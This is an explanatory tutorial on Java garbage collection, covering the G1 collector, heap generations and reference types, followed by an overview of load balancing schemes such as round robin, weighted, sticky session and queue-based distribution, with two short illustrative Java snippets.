Introduced in Java 7, this collector was designed to support heaps larger than 4 GB. It uses multiple background threads to scan through the heap, dividing it into regions. It begins by collecting the regions with the most garbage objects, which accounts for its name, G1 (Garbage First). It can be enabled using the -XX:+UseG1GC flag.

There is a chance that the heap fills up before the background threads have finished scanning for unused objects, and in that case we can still encounter a Stop-The-World scenario, with the collector pausing the application until scanning is done. Another advantage G1 has is that it compacts the heap as it goes, whereas the CMS collector compacts only during a full Stop-The-World collection.

G1 Collector String deduplication

Since strings take up a large share of the heap, along with their internal char[] arrays, a new optimization was made in Java 8: it enables the G1 collector to identify strings duplicated across the heap and make them point to the same internal char[] array. It can be enabled with the -XX:+UseStringDeduplication JVM argument and ensures multiple copies of the same string are avoided in the heap.

Another improvement in Java 8 is the removal of the PermGen part of the heap. This space was meant for class metadata, static variables and interned strings. For larger applications it was necessary to optimize and tune this portion of the heap, and more often than not it resulted in an OutOfMemoryError. With the JVM itself now taking care of this, it goes a long way toward improving performance.

Garbage Collection in Java

Garbage Collection is basically the process of allocating and deallocating memory space for objects. In Java it is handled by the JVM itself, and the developer need not write code for it, unlike in C or C++. To understand how Garbage Collection works in Java, we need to understand certain basics of the JVM and its memory management.

The JVM, or Java Virtual Machine, is basically an abstract computing machine that translates bytecode into machine language, which is what makes programs platform independent. Each JVM implementation can vary in the way Garbage Collection is implemented. Oracle previously had the JRockit JVM, and after it took over Sun it uses the HotSpot JVM in addition to JRockit.

[Diagram: JVM architecture]

Now if we take a look at the standard HotSpot JVM architecture, we see there are two main components related to garbage collection: the garbage collector itself and the heap memory. The heap is where all objects are stored at run time, while the stack contains local variables and references to objects. Once an object is no longer referenced, it is evicted from the heap memory. What essentially happens in garbage collection is that such objects are evicted from the heap and the space is reclaimed.

[Diagram: Java heap memory]

Now if we take the heap memory, there are 3 major areas, as seen in the above diagram: Young Generation, Old Generation and Permanent Generation.

Now when we take the Young Generation, it is further subdivided into 3 regions.

Eden - the space where any new object first enters the runtime memory area.

S0 Survivor Space - objects are moved from Eden to S0, and similarly from S0 to the S1 Survivor Space.

Objects in the Survivor Spaces are eventually moved to the Tenured region, while the Permanent Generation contains meta information about classes and methods. This PermGen space was removed in Java 8.

Now let us take a look at how the garbage collection process actually works. Every new object that is created is first stored in the Eden space of the Young Generation of the heap memory area.

Now when a Minor Garbage Collection begins, all live objects (those that are still referenced) are moved from Eden to S0, and similarly all live objects in S0 are moved to S1. Basically all the live objects are set aside, and the objects which are not live (not referenced) are the ones marked for garbage collection. Depending on the kind of garbage collector, the marked objects will either be removed in one go or cleaned up in a separate phase.

Now coming to the Old Generation: live objects that have survived in S1 are promoted to the old generation space, and the dereferenced objects in S1 are marked for garbage collection. This is the last phase in the instance life cycle with respect to Java GC. Major Garbage Collection then scans the old generation part of the heap and marks all the dereferenced instances there.

Once all the dereferenced instances are removed from the heap memory, their locations become empty and available for future objects. These blank spaces are by default fragmented across the memory area, and it is advisable to defragment (compact) them for quicker memory allocation. Based on the type of garbage collector, the reclaimed memory is either compacted dynamically or in a separate phase of GC.

Just before an object is removed from memory, the garbage collector invokes the finalize() method of the respective instance so it can free up any resources it holds. There is no guaranteed order or time at which finalize is invoked before the memory is freed. Garbage collection is done by a daemon thread.

When is an object eligible for garbage collection?

Basically, Java has different reference types for an object that determine its eligibility for removal; a short sketch follows the list below.

Strong Reference - not eligible for garbage collection.

Soft Reference - garbage collection is possible, but only as a last option, when memory runs low.

Weak and Phantom References - indicate that garbage collection is possible.
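
A minimal sketch showing the difference in practice with java.lang.ref.WeakReference (System.gc() is only a hint, so the output can vary between runs):

import java.lang.ref.WeakReference;

public class ReferenceDemo {
    public static void main(String[] args) {
        StringBuilder data = new StringBuilder("cached value");
        WeakReference<StringBuilder> weak = new WeakReference<>(data);

        data = null;    // drop the only strong reference
        System.gc();    // request a collection; not guaranteed to run immediately

        // Once a collection has run, the weakly reachable object may be gone, so always null-check
        System.out.println(weak.get() == null ? "collected" : "still reachable");
    }
}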

The compiler and runtime can also choose to free objects earlier if they see no further use for them. For example, an object created in a method and used only within it can effectively be released early by treating its reference as cleared; this is often done as an optimization. There is added complexity if the object's fields have been copied into registers and those values could still be used later, but the instance itself can still be marked for garbage collection.

Load Balancing Schemes

The concept of load balancing is that tasks or requests are distributed across multiple computers. For example, when I make a standard HTTP request from a client to access a web application, it can be directed to one of multiple web servers. What basically happens here is that the application's workload is distributed among multiple computers, making it more scalable. It also helps in providing redundancy: if one server in a cluster fails, the load balancer distributes the load among the remaining servers. When an error happens and a request is moved from a failing server to a functional server, it is called "failover".

A cluster is typically a set of servers running the same application, and its purpose is twofold: to distribute the load onto different servers and to provide a redundancy/failover mechanism.

What are the common load balancing schemes?

Even Task Distribution Scheme

Also called "Round Robin", here the tasks are evenly distributed between the servers in a cluster: each incoming task goes to the next server in turn. This works when all servers have the same capacity and all tasks need the same amount of effort. The issue is that this method does not consider that each task could require a different amount of effort to process. So you could have a situation where all three servers are given 3 tasks each, T1, T2 and T3; on the face of it this seems equal, but T1 and T2 on Server 1 need more effort to process than T1 and T2 on Servers 2 and 3. In effect Server 1 bears a heavier load than Servers 2 and 3, despite an even distribution.
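
As a small illustrative sketch (not a production load balancer), a round-robin picker can be as simple as an atomic counter over a list of server addresses; the server names here are made up:

import java.util.Arrays;
import java.util.List;
import java.util.concurrent.atomic.AtomicInteger;

public class RoundRobinBalancer {

    private final List<String> servers;
    private final AtomicInteger counter = new AtomicInteger();

    public RoundRobinBalancer(List<String> servers) {
        this.servers = servers;
    }

    // Each call hands out the next server in the list, wrapping around at the end
    public String next() {
        return servers.get(Math.floorMod(counter.getAndIncrement(), servers.size()));
    }

    public static void main(String[] args) {
        RoundRobinBalancer balancer =
                new RoundRobinBalancer(Arrays.asList("server1:8080", "server2:8080", "server3:8080"));
        for (int i = 0; i < 6; i++) {
            System.out.println("request " + i + " -> " + balancer.next());   // cycles through 1, 2, 3, 1, 2, 3
        }
    }
}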

DNS Based Load Balancing

Here you configure the DNS to return different IP addresses when an IP address is requested for your domain name. It is almost similar to the Round Robin scheme, except that computers cache the IP address and keep using it until a new lookup is made. It is not really a recommended approach; it is more advisable to use load balancer software.

Weighted Task Distribution Scheme

As the name indicates, tasks here are distributed to the servers in a relative ratio, which works when the servers in a cluster don't all have the same capacity. Assume we have 3 servers, and one server's capacity is half that of the other two. Now, as tasks arrive to be distributed among the servers, for every 10 tasks given to each of Server 1 and Server 2, Server 3, having only half the capacity, would be given only 5. So the task distribution is done as per each server's capacity relative to the others. However, this still does not consider the processing effort required by each task.

Sticky Session Scheme

So far, in the previous load balancing schemes, we have assumed that any incoming request is independent of the others. Consider a typical Java web application where a request arrives at Server 1 and some values are written into session state. Now the same user makes another request, which is sent to Server 2; you could have a scenario where it is unable to get the session data, as it is stored on Server 1.

A typical scenario: the user logs in, enters credentials, is validated and taken to the home page. On the first request the user makes, we store the user id and password in a session on Server 1, as that is needed across the application. The user's next request, say navigating from the home page to a registration page, is sent to Server 2. Here we need the user credentials, which however are stored in session state on Server 1. So we end up with a scenario where the request cannot get at the session data.

This can be resolved using sticky session load balancing, where instead of distributing individual tasks among servers, we distribute sessions: all requests from the same user session are sent to the same server, to prevent loss of data. For example, in a shopping cart application, the entire session (user logs in -> home page -> selects items -> pays the bill) is handled by one server for that user. This in turn can result in an uneven distribution of workload, as some sessions will have more tasks than others.

Even Size Task Queue Distribution Scheme

This is similar to weighted task distribution, but instead of routing all the tasks to a server at once, they are kept in per-server queues. So if, say, 10 tasks are to be distributed to a server, they are placed in its queue rather than handed over in one go. These queues contain the tasks that are being processed by the server or are about to be processed, and whenever a task completes, it is removed from that server's queue.

Here we ensure that each server queue has the same number of tasks in progress. Servers with higher capacity finish their tasks faster, freeing up space in their queues for new tasks. In this way we take into account both the capacity of the server and the effort needed to process each task: any new task is sent to the server whose queue has the fewest tasks lined up. If a server becomes overloaded, its queue grows larger than the task queues of the other servers, and that server is not assigned any new tasks until its queue drains.
